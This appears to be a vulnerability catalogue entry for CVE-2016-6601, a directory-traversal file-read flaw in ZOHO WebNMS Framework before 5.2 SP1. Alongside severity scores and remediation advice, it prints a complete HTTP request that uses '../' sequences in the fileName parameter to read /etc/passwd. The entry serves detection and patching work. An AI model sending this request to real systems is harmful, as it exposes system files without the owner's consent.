| Title | ZOHO WebNMS Framework <5.2 SP1 - Local File Inclusion |
|---|---|
| Author | 0x_Akoko |
| Severity | High |
| Impact | Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information, remote code execution, or complete compromise of the affected system. |
| Remediation | Upgrade to ZOHO WebNMS Framework version 5.2 SP1 or later to mitigate this vulnerability. |
| CVSS Score | 7.5 |
| EPSS Score | 0.9278 |
| CVE ID | CVE-2016-6601 |
| CWE ID | CWE-22 |
| Tags | cve2016 cve edb zoho lfi webnms zohocorp vuln |
ZOHO WebNMS Framework before version 5.2 SP1 is vulnerable local file inclusion which allows an attacker to read arbitrary files via a .. (dot dot) in the fileName parameter to servlets/FetchFile.
GET /servlets/FetchFile?fileName=../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2016/CVE-2016-6601.yaml
🦈 Packet Capture: ⬇️ Download cve-2016-6601.pcap
N/AN/A